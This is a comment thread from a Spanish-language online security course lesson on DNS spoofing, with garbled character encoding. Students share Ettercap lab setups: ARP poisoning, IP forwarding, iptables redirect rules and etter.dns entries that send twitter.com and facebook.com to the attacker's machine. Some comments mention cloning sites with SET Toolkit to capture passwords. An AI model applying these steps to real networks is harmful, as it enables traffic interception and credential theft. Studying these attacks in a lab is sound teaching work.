No tienes acceso a esta clase

隆Contin煤a aprendiendo! 脷nete y comienza a potenciar tu carrera

DNS Spoofing

12/33
Recursos

Aportes 14

Preguntas 9

Ordenar por:

驴Quieres ver m谩s aportes, preguntas y respuestas de la comunidad?

o inicia sesi贸n.

Yo creo que tendr铆a que explicar un poco mas t茅cnico lo que se esta haciendo.

鈥淟a suplantaci贸n de DNS, tambi茅n conocida como envenenamiento por cach茅 DNS, es una forma de pirater铆a inform谩tica en la que se introducen datos corruptos del DNS en la cach茅 del solucionador de DNS, lo que hace que el servidor de nombres devuelva un registro de resultados incorrecto, por ejemplo, una direcci贸n IP. Esto da lugar a que el tr谩fico se desv铆e al equipo del atacante (o a cualquier otro equipo).鈥 Wikipedia.

DNS Spoofing en 2022:
En mi caso para que funcione el ataque tuve que realizar configuraciones extra para que Ettercap no crashee:

#Estando como sudo

#Cambiar "enp2s0" porel nombre de tu interfaz de red.
echo 0 > /proc/sys/net/ipv6/conf/enp2s0/use_tempaddr

#Habilitamos el reenv铆o de paquetes en el sistema. 
echo 1 > /proc/sys/net/ipv4/ip_forward

Tambien, en el archivo 鈥/etc/ettercap/etter.conf鈥 hay que descomentar las lineas de redireccion IPv6:

#---------------
#     Linux 
#---------------

   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp -d %destination --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp -d %destination --dport %port -j REDIRECT --to-port %rport"

# pendant for IPv6 - Note that you need iptables v1.4.16 or newer to use IPv6 redirect
   redir6_command_on = "ip6tables -t nat -A PREROUTING -i %iface -p tcp -d %destination --dport %port -j REDIRECT --to-port %rport"
   redir6_command_off = "ip6tables -t nat -D PREROUTING -i %iface -p tcp -d %destination --dport %port -j REDIRECT --to-port %rport"

As铆 y todo el ataque tiene problemas a la hora de spoofear paginas que tengan certificado SSL.

hey listen! :v
-Confirmo un comentario de @Kevin Reyes, no se puede con paginas tan populares, es mas, ni tumblr y esa cosa esta bien abandonada.
intenten con paginas mas b谩sicas/impopulares por cuesti贸n de practica, pero si realmente lo quieren hacer buscaran 馃槂
-si ettercap se cierra en el momento que ponen la palomita del inicio, posiblemente siguieron la recomendaci贸n del compa帽ero que sugiere cambiar el par de l铆neas de 鈥渆tter.conf鈥, regr茅senlas como estaban.

Kali tiene herramientas que permiten crear una p谩gina identica a la que quieres suplantar

la herramienta SET Toolkit esta muy bien, clona una web para capturar las contrase帽as

Actualamente ettercap tiene otras configuraciones. Abajo o arriba mi compa帽ero valentin explcia las configuracioenes.

Si no les sale el apache al entrar a la pagina, intenten poner una menos reconocida y menos segura que no se porque pero con las mas famosas no me permite hacer el fake

Hice los pasos en los archivos etter.dns y etter.conf exactamente como en el video, ademas de iniciar el servicio apache2. Cuando en la maquina de lubuntu inicio twitter o facebook, no se redirige a la pagina de apache de la maquina de kali鈥 sino a la pagina oficial. Si alguien sabe porque o tiene algun consejo se lo agradeceria

Incre铆ble , hay que estar mas alertas a este tipo de ataques.

Hola Platzi, me pueden ayudar. Hice todos los pasos del profesor pero no me resulta.
Entre a mi maquina Kali, desde terminal 

dhclient -r eth0
dhclient eth0
Tengo salida con ping 8.8.8.8
Tengo respuesta con host www.platzi.com
Alcanzo mi maquina Ubuntu con un ping
Abr铆 ettercap en eth0
puse stop en ettercap
busque host (me detecto mi maquina Ubuntu y mi puerta predeterminada)
coloque Target 1 la maquina Ubuntu
Target 2 mi puerta predeterminada
inicie ARP poisoning desde MITM
habilite plugin de dns_spoof
fui a mi terminal y coloque gedit /etc/ettercap/etter.dns
Agregue el siguiente codigo
twitter.com      A   ipKali
*.twitter.com    A   ipKali
www.twitter.com  PTR ipKali     # Wildcards in PTR are not allowed


facebook.com      A   ipKali
*.facebook.com    A   ipKali
www.facebook.com  PTR ipKali     # Wildcards in PTR are not allowed

Luego coloque gedit /etc/ettercap/etter.conf
coloque el siguiente codigo
ec_uid = 0            # nobody is the default
ec_gid = 0                # nobody is the default

#---------------
#     Linux 
#---------------
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport"


Le铆 un comentario de la comunidad de Platzi en donde te dicen que intentes colocar la siguiente configuraci贸n. Lo hice, primero resetee los valores a default de los archivos etter.dns y etter.conf y luego apague mi maquina, volv铆 hacer los pasos igual a los ya mencionados hasta este punto configure en la parte de Linux estos nuevos parametros. Y segu铆 igual con los siguientes pasos.

#---------------
#     Linux 
#---------------
redir_command_on = "iptable -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

redir_command_off = "iptable -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Di start en attercap
Abr铆 wireshark desde Kali en eth0.

En ambas ocasiones continue los pasos pero al ingresar en la terminal de Ubuntu el comando host twitter.com
me arroja twitter.com has address 104.244.42.1
Ni siquiera me reconoce que redireccione a la ip de Kali. Continue con la clase pero me redirecciona al sitio oficial.


Les dejo las versiones que estoy usando.
ettercap 0.8.3
Debian 5.7.6-1kali2

DNS spoofing es un m茅todo para alterar las direcciones de los servidores DNS que utiliza la potencial v铆ctima y de esta forma poder tener control sobre las consultas que se realizan.

Excelente clase

Excelente.